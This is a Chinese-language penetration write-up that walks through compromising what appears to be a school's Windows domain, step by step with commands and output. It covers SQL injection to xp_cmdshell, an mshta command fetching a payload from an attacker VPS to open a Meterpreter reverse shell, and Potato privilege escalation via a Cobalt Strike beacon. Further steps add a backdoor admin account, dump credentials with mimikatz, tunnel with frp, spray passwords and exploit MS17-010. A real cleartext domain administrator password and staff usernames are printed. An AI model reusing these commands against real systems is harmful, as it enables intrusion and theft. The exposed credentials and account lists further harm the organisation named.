記:內網滲透
2021-02-07 LemonSecSqlmap --sql-shellSqlmap --sql-shell命令,獲取一個命令行模式。xp_cmdshell,先查看是否存在
sql-shell> select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'
[22:01:36] [INFO] fetching SQL SELECT statement query output: 'select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell''
[22:01:36] [INFO] resumed: '1'
select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell': '1'啟用xp_cmdshell
sql-shell> EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;
[09:48:09] [INFO] executing SQL data execution statement: 'EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE'
EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE: 'NULL'嘗試執行命令
sql-shell> exec master..xp_cmdshell 'whoami'
[09:48:58] [INFO] executing SQL data execution statement: 'exec master..xp_cmdshell 'whoami''
exec master..xp_cmdshell 'whoami': 'NULL'命令無回顯,應該是伺服器被降權。
sql-shell> select @@servername
Sqlmap --os-shell
[23:02:04] [INFO] fetching SQL SELECT statement query output: 'select @@servername'
[23:02:05] [INFO] retrieved: 'NEWDATABASE'
select @@servername: 'NEWDATABASE'
sql-shell> select host_name()
[23:02:19] [INFO] fetching SQL SELECT statement query output: 'select host_name()'
[23:02:21] [INFO] retrieved: 'MAIL'
select host_name(): 'MAIL'目標系統為:
web server operating system: Windows 8.1 or 2012 R2
Mshta 反彈 shell
web application technology: ASP.NET, Microsoft IIS 8.5, ASP
back-end DBMS: Microsoft SQL Server 2012嘗試各種命令但是發現回顯太慢,未找到web路徑,無法寫web馬、exe馬,這裡嘗試使用hta文件。
➜ ~ sqlmap -r /Users/apple/Desktop/1.txt --os-shell
msf啟動
msf6 exploit(windows/misc/hta_server) > run
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 1.1.1.1:4444
[*] Using URL: http://0.0.0.0:8080/8HGLrG47OUEJ.hta
[*] Local IP: http://vps:8080/8HGLrG47OUEJ.hta
[*] Server started.在目標機器執行
mshta.exe http://vps:8080/8HGLrG47OUEJ.hta
maf回顯
[*] ip hta_server - Delivering Payload
[*] Sending stage (175174 bytes) to ip
[*] Meterpreter session 1 opened (vps_ip:4444 -> ip:61915) at 2020-12-04 10:01:42 +0800
msf6 exploit(windows/misc/hta_server) > sessions -l
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- -
1 meterpreter x86/windows NT Service\MSSQLSERVER @ DATABASE vps_ip:4444 -> ip:61915 (10.10.10.5)
msf6 exploit(windows/misc/hta_server) > sessions -i 1
[*] Starting interaction with 1...查看目標系統信息
meterpreter > sysinfo
Computer : DATABASE
OS : Windows 2012 R2 (6.3 Build 9600).
Architecture : x64
System Language : zh_TW
Domain : WEGO
Logged On Users : 14
Meterpreter : x86/windows進入shell查看一下具體信息,有亂碼設置一下編碼
C:\Windows\system32>chcp 65001
C:\Windows\system32>ipconfig /all
ipconfig /all
Windows IP Configuration
Host Name . . . . . . . . . . . . : database
Primary Dns Suffix . . . . . . . : xx.xx.x x.xx
Node Type . . . . . . . . . . . . : Hybrid
IP Routing Enabled. . . . . . . . : No
WINS Proxy Enabled. . . . . . . . : No
DNS Suffix Search List. . . . . . : xx.xx.x x.xx
Ethernet adapter NIC2:
Media State . . . . . . . . . . . : Media disconnected
Connection-specific DNS Suffix . :
Description . . . . . . . . . . . : Broadcom NetXtreme Gigabit Ethernet #4
Physical Address. . . . . . . . . : 10-98-36-B0-ED-AE
DHCP Enabled. . . . . . . . . . . : No
Autoconfiguration Enabled . . . . : Yes
Ethernet adapter NIC1:
Connection-specific DNS Suffix . :
Description . . . . . . . . . . . : Broadcom NetXtreme Gigabit Ethernet #3
Physical Address. . . . . . . . . : 10-98-36-B0-ED-AD
DHCP Enabled. . . . . . . . . . . : No
Autoconfiguration Enabled . . . . : Yes
IPv4 Address. . . . . . . . . . . : 10.10.10.5(Preferred)
Subnet Mask . . . . . . . . . . . : 255.255.254.0
Default Gateway . . . . . . . . . : 10.10.10.254
DNS Servers . . . . . . . . . . . : 10.10.10.3
10.10.10.2
NetBIOS over Tcpip. . . . . . . . : Enabled具有內網環境,DNS伺服器可能就是域控。
DNS Servers . . . . . . . . . . . : 10.10.10.3
提權msf提權
10.10.10.2查看當前用戶
C:\Windows\system32>whoami
whoami
nt service\mssqlserver查看系統信息,打得補丁還是比較多的。
systeminfo
也可以使用msf模塊搜索可執行的本地提權信息
msf6 > use post/multi/recon/local_exploit_suggester
msf6 post(multi/recon/local_exploit_suggester) > run
[*] 10.10.10.5 - Collecting local exploits for x86/windows...
[*] 10.10.10.5 - 35 exploit checks are being tried...
[+] 10.10.10.5 - exploit/windows/local/bypassuac_eventvwr: The target appears to be vulnerable.
nil versions are discouraged and will be deprecated in Rubygems 4
[+] 10.10.10.5 - exploit/windows/local/ikeext_service: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms16_032_secondary_logon_handle_privesc: The service is running, but could not be validated.
[+] 10.10.10.5 - exploit/windows/local/ms16_075_reflection: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms16_075_reflection_juicy: The target appears to be vulnerable.
[*] Post module execution completedms16_075爛土豆提權,直接使用msf進行提權,提權提崩了。。。,嘗試exe提權,發現目錄不可寫。權限不夠。(應該找可寫目錄的,後來找到一個可寫目錄。)
meterpreter > upload /tmp/beacon.exe C:/Windows/Temp
cs提權加載插件,下載地址:
https://github.com/scanfsec/AggressorCNA/blob/master/reflectiveJuicyPotato/juicypotato.cn
beacon> elevate juicypotato http
[*] Task Beacon to run windows/beacon_http/reverse_http (1.1.1.1:7777) via JuicyPotato (ms16-075)
[+] host called home, sent: 599618 bytes
[+] received output:
.
[+] received output:
..
[+] received output:
..
[+] received output:
.
[+] received output:
[+] authresult 0
[*] {4991d34b-80a1-4291-83b6-3328366b9097};NT AUTHORITY\SYSTEM
[+] CreateProcessWithTokenW OK提權失敗,接著使用另一個腳本
https://github.com/DeEpinGh0st/Erebus
成功返回一個shell,system權限。
[*] Task Beacon to run windows/beacon_http/reverse_http (1.1.1.1:7777) via RottenPotato (ms16-075)
[*] Tasked beacon to spawn NTLM DCOM->RPC NTLM Reflection (MS16-075)
[+] host called home, sent: 256865 bytes但是當前用戶確實mssql,權限確實system權限,mssql上線需要遷移進程。
good beacon> shell whoami
[*] Tasked beacon to run: whoami
[+] host called home, sent: 37 bytes
[+] received output:
nt service\mssqlserver
beacon> getuid
[*] Tasked beacon to get userid
[+] host called home, sent: 8 bytes
[*] You are NT AUTHORITY\SYSTEM (admin)使用當前beacon,注入一個administrator用戶的進程。
成功生成一個beacon。
創建用戶先創建用戶並加入管理員組
查看用戶組
beacon> shell net localgroup
[*] Tasked beacon to run: net localgroup
[+] host called home, sent: 45 bytes
[+] received output:
\\DATABASE 的別名
----
*Access Control Assistance Operators
*Administrators
*Backup Operators
*Certificate Service DCOM Access
*Cryptographic Operators
*Distributed COM Users
*Event Log Readers
*Guests
*HelpLibraryUpdaters
*Hyper-V Administrators
*IIS_IUSRS
*Network Configuration Operators
*Performance Log Users
*Performance Monitor Users
*Power Users
*Print Operators
*RDS Endpoint Servers
*RDS Management Servers
*RDS Remote Access Servers
*Remote Desktop Users
*Remote Management Users
*Replicator
*SQLServer2005SQLBrowserUser$NEWDATABASE
*SQLServerMSASUser$NEWDATABASE$MSSQLSERVER
*Users
*WinRMRemoteWMIUsers__
命令已經成功完成。管理員組添加用戶
beacon> shell net localgroup Administrators good /add
[*] Tasked beacon to run: net localgroup Administrators good /add
[+] host called home, sent: 70 bytes
[+] received output:
命令已經成功完成。查看管理員組
beacon> shell net localgroup Administrators
[*] Tasked beacon to run: net localgroup Administrators
[+] host called home, sent: 60 bytes
[+] received output:
別名 Administrators
註解 Administrators 可以完全不受限制地存取電腦/網域
成員
----
Administrator
good
HelpAssistant
WEGO\Domain Admins
命令已經成功完成。埠掃描,嘗試連接3389
beacon> portscan 10.10.10.5 1-1024,3389,5000-6000 arp 1024
抓取密碼
[*] Tasked beacon to scan ports 1-1024,3389,5000-6000 on 10.10.10.5
[+] host called home, sent: 93245 bytes
[+] received output:
(ARP) Target '10.10.10.5' is alive. 10-98-36-B0-ED-AD
10.10.10.5:5985
[+] received output:
10.10.10.5:3389
[+] received output:
10.10.10.5:139
10.10.10.5:135
10.10.10.5:80
10.10.10.5:445 (platform: 500 version: 6.3 name: DATABASE domain: WEGO)
Scanner module is complete運行mimikatz抓取密碼。
beacon> logonpasswords
wdigest :
* Username : Administrator
* Domain : WEGO
* Password : jo6ek6vul3vm,6打域控,掛socker代理(cs的socks4很不好用,後來使用的是frp)。
beacon> socks 1070
獲取域內的基礎信息查詢機器屬於哪個域
[+] started SOCKS4a server on: 1070
[+] host called home, sent: 16 bytesshell net config Workstation
beacon> shell net config Workstation
查詢當前內網中域數量
[*] Tasked beacon to run: net config Workstation
[+] host called home, sent: 53 bytes
[+] received output:
電腦名稱 \\DATABASE
完整電腦名稱 database.xx.xx.x x.xx
使用者名稱 Administrator
工作站啟動於
NetBT_Tcpip_{2B6B95FB-22AC-4BE5-9B0E-6778A02AF68C} (109836B0EDAD)
軟體版本 Windows Server 2012 R2 Standard
工作站網域 WEGO
工作站網域 DNS 名稱 xx.xx.x x.xx
登入網域 WEGO
COM 啟用等候逾時(秒) 0
COM 傳送計數 (位元組) 16
COM 傳送等候逾時(千分之一秒) 250
命令已經成功完成。查詢有幾個域, 查詢域列表
beacon> shell net view /domain
查詢域控制器主機名
[*] Tasked beacon to run: net view /domain
[+] host called home, sent: 47 bytes
[+] received output:
Domain
----
KG
WEGO
WORKGROUP
命令已經成功完成。beacon> shell net group "domain controllers" /domain
查詢域控制器
[*] Tasked beacon to run: net group "domain controllers" /domain
[+] host called home, sent: 69 bytes
[+] received output:
這項要求會在網域 xx.xx.x x.xx 下的網域控制站處理。
群組名稱 Domain Controllers
註解 在網域所有的網域控制站
成員
----
AD1$ AD2$ AD3$
命令已經成功完成beacon> shell net group "domain controllers" /domain
查看一下域控制器的IP
[*] Tasked beacon to run: net group "domain controllers" /domain
[+] host called home, sent: 69 bytes
[+] received output:
這項要求會在網域 xx.xx.x x.xx 下的網域控制站處理。
群組名稱 Domain Controllers
註解 在網域所有的網域控制站
成員
----
AD1$ AD2$ AD3$
命令已經成功完成beacon> shell ping AD1.xx.xx.x x.xx
查詢域管理用戶
[*] Tasked beacon to run: ping AD1.xx.xx.x x.xx
[+] host called home, sent: 54 bytes
[+] received output:
Ping AD1.xx.xx.x x.xx [10.10.10.2] (使用 32 位元組的資料):
回覆自 10.10.10.2: 位元組=32 時間<1ms TTL=128
回覆自 10.10.10.2: 位元組=32 時間<1ms TTL=128
回覆自 10.10.10.2: 位元組=32 時間<1ms TTL=128
回覆自 10.10.10.2: 位元組=32 時間<1ms TTL=128
10.10.10.2 的 Ping 統計資料:
封包: 已傳送 = 4,已收到 = 4, 已遺失 = 0 (0% 遺失),
大約的來回時間 (毫秒):
最小值 = 0ms,最大值 = 0ms,平均 = 0ms
beacon> shell ping AD2.xx.xx.x x.xx
[*] Tasked beacon to run: ping AD2.xx.xx.x x.xx
[+] host called home, sent: 54 bytes
[+] received output:
Ping AD2.xx.xx.x x.xx [10.10.10.3] (使用 32 位元組的資料):
回覆自 10.10.10.3: 位元組=32 時間<1ms TTL=128
回覆自 10.10.10.3: 位元組=32 時間<1ms TTL=128
回覆自 10.10.10.3: 位元組=32 時間<1ms TTL=128
回覆自 10.10.10.3: 位元組=32 時間<1ms TTL=128
10.10.10.3 的 Ping 統計資料:
封包: 已傳送 = 4,已收到 = 4, 已遺失 = 0 (0% 遺失),
大約的來回時間 (毫秒):
最小值 = 0ms,最大值 = 0ms,平均 = 0ms
beacon> shell ping AD3.xx.xx.x x.xx
[*] Tasked beacon to run: ping AD3.xx.xx.x x.xx
[+] host called home, sent: 54 bytes
[+] received output:
Ping AD3.xx.xx.x x.xx [10.10.10.4] (使用 32 位元組的資料):
回覆自 10.10.10.4: 位元組=32 時間<1ms TTL=128
回覆自 10.10.10.4: 位元組=32 時間<1ms TTL=128
回覆自 10.10.10.4: 位元組=32 時間<1ms TTL=128
回覆自 10.10.10.4: 位元組=32 時間<1ms TTL=128
10.10.10.4 的 Ping 統計資料:
封包: 已傳送 = 4,已收到 = 4, 已遺失 = 0 (0% 遺失),
大約的來回時間 (毫秒):
最小值 = 0ms,最大值 = 0ms,平均 = 0msbeacon> shell net group "domain admins" /domain
查詢域用戶列表
[*] Tasked beacon to run: net group "domain admins" /domain
[+] host called home, sent: 64 bytes
[+] received output:
這項要求會在網域 xx.xx.x x.xx 下的網域控制站處理。
群組名稱 Domain Admins
註解 指定的網域系統管理員
成員
----
Administrator albert_huang chuck_ho
jerrytsao juinyih se
srj wegovpn2020
命令已經成功完成beacon> shell net user /domain
查看當前域內機器主機名
[*] Tasked beacon to run: net user /domain
[+] host called home, sent: 47 bytes
[+] received output:
這項要求會在網域 xx.xx.x x.xx 下的網域控制站處理。
\\AD2.xx.xx.x x.xx 的使用者帳戶
----
098 201sandy 203savanah
204hanna 205vanessa 213amy
2305 3557 526alice
account Administrator affair
albert_huang alice31707 alison
amy amyjccd andrewmunro
anita anne ap7653
argreschler ashinlover ashleychen
beauc berrywu bkmanager
brandonolen busm caca
camy4648 carolina caroline
cashier charlie chellie72
cherry2011 cheryllin chi
chi0707 CHIAEN christina
christinelee chuanmien chuck_ho
chunying cindykyang cleeve
collinsko0109 cyajen0717 Dale
dfl001 dianahou director
dola dperabo eileen5717
epayding esansan eslteacher
eusebia evanceho faithtien
fatfat1188 fayina flowerrr
guccichia Guest gvholley
haiyou ikuchen indigododos
iriscai IUSER_WEGONET IUSER_WGPS
IUSR_MAIL ivyc ivyhou
IWAM_MAIL j5218 Jacobson8959
jennifer jennifer_liang jerrytsao
jessicama711 jgtoma jih455beacon> shell net view
查看某個域中的所有計算機主機名
[*] Tasked beacon to run: net view
[+] host called home, sent: 39 bytes
[+] received output:
伺服器名稱 說明
----
\\3060-1E
\\3060-2E
\\3060-2F
\\3060-4B
\\3060-5C
\\3060-5D
\\ACADEMIC
\\ACCOUNT-3070
\\ACCOUNT3050 會計組長
\\AD1
\\AD2
\\AD3
\\AFFAIRS-3060
\\ASUS-500G4-PC
\\CARD100 卡鍾主機
\\CDTOWER17
\\DATABASE
\\DELL7020B-36
\\DFL-3340-67
\\DFL-FILES2017
\\FILES
\\FILES2
\\LIB-3020-83
\\LIB-7020-82
\\MEDIA-DOME
\\PCSCRIBE-7
\\PCTEACHER-100
\\PERSONNEL-3060
\\STPC-01
\\STPC-02
\\STPC-03
\\STPC-04
\\STPC-05
\\STPC-06
\\STPC-07
\\STPC-08
\\STPC-09
\\STPC-10
\\STPC-11
\\STPC-12
\\STPC-13
\\STPC-14
\\STPC-15
\\STPC-16
\\STPC-17
\\STPC-18
\\STPC-19
\\STPC-20
\\STPC-21
\\STPC-22
\\STPC-23
\\STPC-24
\\STPC-25
\\STPC-26
\\STPC-27
\\STPC-28
\\STPC-29
\\STPC-30
\\STPC-31
\\STPC-32
\\STPC-33
\\STPC-34
\\STPC-35
\\STPC-36
\\STPC-37
\\STPC-39
\\STPC-40
\\STPC-41
\\STPC-42
\\STPC-47
\\STUFILES
\\WIN101C
\\WIN106D
\\WIN10MUSIC56net view /domain:XXX
查詢域內所有計算機主機名beacon> shell net group "domain computers" /domain
[*] Tasked beacon to run: net group "domain computers" /domain
[+] host called home, sent: 67 bytes
[+] received output:
這項要求會在網域 xx.xx.x x.xx 下的網域控制站處理。
群組名稱 Domain Computers
註解 所有已加入網域的工作站及伺服器
成員
----
1A86TV$ 2003R2-32BITS$ 2003SERVER$
3060-1E$ 3060-1F$ 3060-2A$
3060-2B$ 3060-2C$ 3060-2D$
3060-2E$ 3060-2F$ 3060-4A$
3060-4B$ 3060-4C$ 3060-4D$
3060-5A$ 3060-5B$ 3060-5C$
3060-5D$ 3060-6E$ 3060-6F$
3060CALLIGRAPHY$ 4730WORK$ ACADEMIC$
ACCOUNT3050$ ACCOUNT-3070$ ACCOUNT-7$
ACTIVITES-3020A$ ACTIVITES-3020B$ ACTIVITIES3020C$
ACTIVITY-181$ AD2-NEW$ AD3-OLD$
ADMINISTRATOR$ AFFAIRS-3060$ ALBERT_HUANG$
ANNALIU$ ANNALIU-XP-VM$ ASUS-500G4-PC$
B8AC6F362198$ B8AC6F3C1711$ B8AC6F3C727F$
CALLIGRAPHY3060$ CARD100$ CASHIER-3070$
CASHIER7$ CDTOWER17$ CG-86TV$
CHIEF-PE$ CURRICULUM-2019$ CURRICULUM-3060$
DATABASE$ DB2019$ DELL-2420-3$
DELL7020B-36$ DELL7020B-PC$ DELL9020-PC$
DELLPC$ DFL-3340-65$ DFL-3340-66$
DFL-3340-67$ DFL-3340-70$ DFL-3340ENG-68$
DFL-3340ENG-69$ DFL-3380-81$ DFL-3380-82$
DFL-3400-85$ DFL-3400-86$ DFL-4730-80$
DFL-ACER-82$ DFL-ACER-84$ DFL-ACTIVITIES$
DFL-CURRICULUM$ DFL-FILES2017$ DFL-NB1$
DFL-NB10$ DFL-NB11$ DFL-NB3$
DFL-NB4$ DFL-NB5$ DFL-NB6$
DFL-NB7$ DFL-NB9$ DFL-SUPERVISOR2$
DIR-AFFAIRS$ DIR-DFL$ DIR-JAPAN$
DIR-STUDENT$ DISCIPLINE-3060$ ESL-603$
ESLNB-2420-C$ ESLNB-2420-R$ ESL-P243-1$
ESL-P243-2$ ESL-P243-3$ ESL-P243-4$
FILES$ FILES2$ FITNESSCENTER$
HAPPY-HOUSE$ HEALTH-3060$ HEALTH7$
HEALTH-SERVICE$ HYGIENE-3070$ HYPERV2008R2$
JAPAN77-TEACHER$ KITCHEN3020$ KITCHEN-7-60$
LIB-3020-83$ LIB-3020-84$ LIB-3020-85$
LIB-3020-86$ LIB-3020-87$ LIB3060TEACHER$
LIB-3060TEACHER$ LIB-7020-82$ LIB-TEACHER$
MAIL$ MAIL2$ MEDIA-DOME$
ML20936$ ML20936-PC$ nas8be8d1$
nasbfa3ee$ NEW_NB01$ NEW-WIN$
NWIN7-0$ NWIN7-1$ NWIN7-2$
NWIN7-3$ NWIN7-4$ OLD-DATA814$
OLDDATABASE$ PCSCRIBE-7$ PCTEACHER-100$
PE-3060$ PERSONNEL-3060$ PRINCIPAL$
PRINCIPAL-21$ PROGRAMER$ REGISTRAR-3070$
SCHOOL2003$ SCHOOL-3070$ SCHOOL-PC-01$
SCHOOL-PC-02$ SCHOOL-SYS$ SCHOOLWU-PC$
SE$ SE7$ SE-PC$
SE-XP$ ST-00$ ST000$
ST-000$ ST50$ ST50PC$
STPC-01$ STPC-02$ STPC-03$
STPC-04$ STPC-05$ STPC-06$
STPC-07$ STPC-08$ STPC-09$
STPC-10$ STPC-11$ STPC-12$
STPC-13$ STPC-14$ STPC-15$
STPC-16$ STPC-17$ STPC-18$
STPC-19$ STPC-20$ STPC-21$
STPC-22$ STPC-23$ STPC-24$
STPC-25$ STPC-26$ STPC-27$
STPC-28$ STPC-29$ STPC-30$
STPC-31$ STPC-32$ STPC-33$
STPC-34$ STPC-35$ STPC-36$
STPC-37$ STPC-38$ STPC-39$
STPC-40$ STPC-41$ STPC-42$
STPC-43$ STPC-44$ STPC-45$
STPC-46$ STPC-47$ STPC-48$
STPC-49$ STPREPC$ STPRE-PC$
STUFILES$ SURVEILLANCE$ T1-WIN7$
TEACHER-WU$ TEST-WIN10-1$ TRYPC001$
VICE-DIRECTOR$ VICE-PRINCIPAL$ VIDEOSPIDER$
WEGO-DC3$ WEGO-DC4$ WIN101A$
WIN101B$ WIN101C$ WIN101D$
WIN103A$ WIN103B$ WIN103C$
WIN103D$ WIN103E$ WIN103F$
WIN104E$ WIN104F$ WIN105E$
WIN105F$ WIN106A$ WIN106B$
WIN106C$ WIN106D$ WIN106E$
WIN10ART12$ WIN10-ART12$ WIN10ART34$
WIN10ART56$ WIN10MULTI$ WIN10MUSIC34$
WIN10MUSIC56$ WIN10OFFICE01$ WIN10OFFICE02$
WIN10OFFICE03$ WIN10OFFICE04$ WIN10SCIENCE34$
WIN10SCIENCE56$ WIN7PROX86-01$ WIN7VM$
WIN7VM-AP$ WU-TEACHING$beacon> shell C:\Windows\TAPI\SharpHound.exe -c all
內網代理搭建
[*] Tasked beacon to run: C:\Windows\TAPI\SharpHound.exe -c all
[+] host called home, sent: 68 bytes
[+] received output:
---
Initializing SharpHound at 下午 03:37 on 2020/12/8
---
Resolved Collection Methods: Group, Sessions, LoggedOn, Trusts, ACL, ObjectProps, LocalGroups, SPNTargets, Container
[+] Creating Schema map for domain xx.xx.x x.xx using path CN=Schema,CN=Configuration,DC=WGPS,DC=TP,DC=EDU,DC=TW
[+] Cache File not Found: 0 Objects in cache
[+] Pre-populating Domain Controller SIDS
Status: 0 objects finished (+0) -- Using 19 MB RAM
[+] received output:
[+] Creating Schema map for domain 10.10.11.13 using path CN=Schema,CN=Configuration,DC=10,DC=10,DC=11,DC=13
Status: 1528 objects finished (+1528 52.68966)/s -- Using 50 MB RAM
[+] received output:
Status: 1674 objects finished (+146 28.37288)/s -- Using 49 MB RAM
[+] received output:
Status: 1675 objects finished (+1 18.61111)/s -- Using 47 MB RAM
[+] received output:
Status: 1675 objects finished (+0 13.95833)/s -- Using 47 MB RAM
[+] received output:
Status: 1676 objects finished (+1 11.63889)/s -- Using 47 MB RAM
Enumeration finished in 00:02:24.3737596
Compressing data to .\20201208153758_BloodHound.zip
You can upload this file directly to the UI
SharpHound Enumeration Completed at 下午 03:40 on 2020/12/8! Happy Graphing!一開始我使用的是cs的自帶代理信息socks4,發現很不穩定,之後使用frp進行穿透。
服務端vps
[common]
bind_addr = 0.0.0.0
dashboard_user = good
dashboard_pwd = good
dashboard_port = 7500
bind_port = 7000訪問vps:7500埠,也是可以看到圖形界面。
目標靶機
配置frpc.ini
[common]
server_addr =1.1.1.1
server_port = 7000
[socks5]
type = tcp
remote_port = 60000
plugin = socks5
use_encryption = true
use_compression = true上傳frpc
beacon> upload /Users/apple/Documents/steady-sec/NW/frp/frpc_full.ini (C:\Windows\TAPI\frpc_full.ini)
[*] Tasked beacon to upload /Users/apple/Documents/steady-sec/NW/frp/frpc_full.ini as C:\Windows\TAPI\frpc_full.ini
[+] host called home, sent: 8402 bytes
beacon> upload /Users/apple/Documents/steady-sec/NW/frp/frpc.ini (C:\Windows\TAPI\frpc.ini)
[*] Tasked beacon to upload /Users/apple/Documents/steady-sec/NW/frp/frpc.ini as C:\Windows\TAPI\frpc.ini
[+] host called home, sent: 195 bytes
[*] Tasked beacon to upload /Users/apple/Documents/steady-sec/NW/frp/frpc as C:\Windows\TAPI\frpcwin10虛擬機中,使用Proxifier,配置代理。
之後使用任何軟體,右鍵->Proxifier->選擇正確的代理。
拿下域控制器批量口令碰撞445埠查看開放445埠的主機
beacon> shell C:\Windows\TAPI\fscan64.exe -h 10.10.10.1/24 -p 445
本地掛代理使用fscan進行掃描
fscan -h 10.10.10.5 -p 445 -user Administrator -pwd jo6ek6vul3vm,6 -domain WEGO -np
或者
go run main.go -h 10.10.10.5 -p 445 -np -user Administrator -pwd jo6ek6vul3vm,6 -domain
SMB:10.10.10.3:445:Administrator jo6ek6vul3vm,6 WEGO
SMB:10.10.10.41:445:Administrator jo6ek6vul3vm,6 WEGO
SMB:10.10.10.19:445:Administrator jo6ek6vul3vm,6 WEGO
SMB:10.10.10.20:445:Administrator jo6ek6vul3vm,6 WEGO
SMB:10.10.10.126:445:Administrator jo6ek6vul3vm,6 WEGO
SMB:10.10.10.154:445:Administrator jo6ek6vul3vm,6 WEGO
SMB:10.10.10.4:445:Administrator jo6ek6vul3vm,6 WEGO
SMB:10.10.10.1:445:Administrator jo6ek6vul3vm,6 WEGO
SMB:10.10.10.6:445:Administrator jo6ek6vul3vm,6 WEGO
SMB:10.10.10.2:445:Administrator jo6ek6vul3vm,6 WEGO
SMB:10.10.10.100:445:Administrator jo6ek6vul3vm,6 WEGO
SMB:10.10.10.42:445:Administrator jo6ek6vul3vm,6 WEGO
SMB:10.10.10.10:445:Administrator jo6ek6vul3vm,6 WEGO
SMB:10.10.10.5:445:Administrator jo6ek6vul3vm,6 WEGO嘗試登錄域控制器3389。
批量掃描MS17010beacon> Ladon 10.10.10.8/24 MS17010
[+] host called home, sent: 1036383 bytes
[+] received output:
Ladon 7.0
Start: 2020-12-04 17:29:22
Runtime: .net 4.0 OS Arch: x64
OS Name: Microsoft Windows Server 2012 R2 Standard
10.10.10.8/24
load MS17010
10.10.10.8/24 is Valid CIDR
IPCound: 256
Scan Start: 2020-12-04 17:29:22
10.10.10.1 MAIL xx.xx.x x.xx [Win 2012 R2 Standard 9600]
10.10.10.48 neweclient.xx.xx.x x.xx
10.10.10.34 workpc2019.xx.xx.x x.xx
10.10.10.20 FILES2 xx.xx.x x.xx [Win 2012 Standard 9200]
10.10.10.19 FILES2 xx.xx.x x.xx [Win 2012 Standard 9200]
10.10.10.5 DATABASE xx.xx.x x.xx [Win 2012 R2 Standard 9600]
10.10.10.42 account-7.xx.xx.x x.xx
10.10.10.46 account3050.xx.xx.x x.xx
10.10.10.38 dell7020b-36.xx.xx.x x.xx
10.10.10.8 WIN-XF2DOSIWBRF [Win (R) 2008 Standard 6003 SP 2]
10.10.10.6 FILES xx.xx.x x.xx [Win 2012 Standard 9200]
10.10.10.9 WIN-XF2DOSIWBRF [Win (R) 2008 Standard 6003 SP 2]
10.10.10.4 AD3 xx.xx.x x.xx [Win 2012 R2 Standard 9600]
10.10.10.17 CDTOWER17 xx.xx.x x.xx [??渀?漀?猀??攀?瘀攀???刀??? ???琀愀渀?愀???? ???攀?瘀?挀攀?倀愀挀欀??]
10.10.10.2 AD1 xx.xx.x x.xx [Win 2012 R2 Standard 9600]
10.10.10.39 ASUS-500G4-PC xx.xx.x x.xx [Win 7 Professional 7601 SP 1]
10.10.10.41 MS17-010 PCSCRIBE-7 xx.xx.x x.xx [Win 7 Professional 7601 SP 1]
10.10.10.3 AD2 xx.xx.x x.xx [Win 2012 R2 Standard 9600]
10.10.10.45 KG-JOOMLA [Win 2008 R2 Standard 7601 SP 1]
10.10.10.35 2014JUINYIHWIN7 [Win 7 Professional 7601 SP 1]
10.10.10.22 ACADEMIC xx.xx.x x.xx [Win 7 Professional 7601 SP 1]
10.10.10.100 CARD100 [Win 7 Professional 7601 SP 1]
10.10.10.90 DFL-FILES2017 [Win 6.1]
[+] received output:
10.10.10.10 MEDIA-DOME [Win 6.1]
[+] received output:
10.10.10.59 school-3070.xx.xx.x x.xx
[+] received output:
10.10.10.115 3060-1e.xx.xx.x x.xx
10.10.10.126 3060-2f.xx.xx.x x.xx
10.10.10.142 win104b.xx.xx.x x.xx
10.10.10.154 3060-5d.xx.xx.x x.xx
[+] received output:
=============================================
OnlinePC:34
Cidr Scan Finished!
End: 2020-12-04 17:30:0641這個IP有漏洞
10.10.10.41 MS17-010 PCSCRIBE-7 xx.xx.x x.xx [Win 7 Professional 7601 SP 1]
使用工具進行利用
check.bat IP
ms17010.bat IP +系統版本
go.bat IP 位數C:\Users\good>cd C:\Users\good\Desktop\nw\ms17-010\
C:\Users\good\Desktop\nw\ms17-010>check.bat 10.10.10.41
[+] SMB Touch started
[*] TargetIp 10.10.10.41
[*] TargetPort 445
[*] RedirectedTargetIp (null)
[*] RedirectedTargetPort 0
[*] NetworkTimeout 60
[*] Protocol SMB
[*] Credentials Anonymous
[*] Connecting to target...
[+] Initiated SMB connection
[+] Target OS Version 6.1 build 7601
Windows 7 Professional 7601 Service Pack 1
[*] Trying pipes...
[-] spoolss - Not accessible (0xC0000022 - NtErrorAccessDenied)
[-] browser - Not accessible (0xC0000022 - NtErrorAccessDenied)
[-] lsarpc - Not accessible (0xC0000022 - NtErrorAccessDenied)
[-] No pipes accessible
[Not Supported]
ETERNALSYNERGY - Target OS version not supported
[Not Vulnerable]
ETERNALROMANCE - Named pipe required for exploit
[Vulnerable]
ETERNALBLUE - DANE
ETERNALCHAMPION - DANE
[*] Writing output parameters
[+] Target is vulnerable to 2 exploits
[+] Touch completed successfully
C:\Users\good\Desktop\nw\ms17-010>MS17-010_.bat 10.10.10.41
[*] MS17-010 Exploit // lu4n.com
[*] Connecting to target for exploitation.
[+] Connection established for exploitation.
[*] Pinging backdoor...
[+] Backdoor returned code: 10 - Success!
[+] Ping returned Target architecture: x86 (32-bit)
[+] Backdoor is already installed -- nothing to be done.
[*] CORE sent serialized output blob (2 bytes):
0x00000000 08 01 ..
[*] Received output parameters from CORE
[+] CORE terminated with status code 0x00000000
C:\Users\good\Desktop\nw\ms17-010>go.bat 10.10.10.41 64
Architecture: 64 is not a valid value.
Architecture: 64 is not a valid value.
^C終止批處理操作嗎(Y/N)? y
C:\Users\good\Desktop\nw\ms17-010>go.bat 10.10.10.41 x64
[+] Selected Protocol SMB
[.] Connecting to target...
[+] Connected to target, pinging backdoor...
[+] Backdoor returned code: 10 - Success!
[+] Ping returned Target architecture: x86 (32-bit) - XOR Key: 0x894EDE86
SMB Connection string is: Windows 7 Professional 7601 Service Pack 1
Target OS is: 7 x86
Target SP is: 1
[+] Backdoor installed
[-] DLL Architecture is: 64 bit
Error sending wrong architecture DLL to target
[-] DLL NOT built
[+] Selected Protocol SMB
[.] Connecting to target...
[+] Connected to target, pinging backdoor...
[+] Backdoor returned code: 10 - Success!
[+] Ping returned Target architecture: x86 (32-bit) - XOR Key: 0x894EDE86
SMB Connection string is: Windows 7 Professional 7601 Service Pack 1
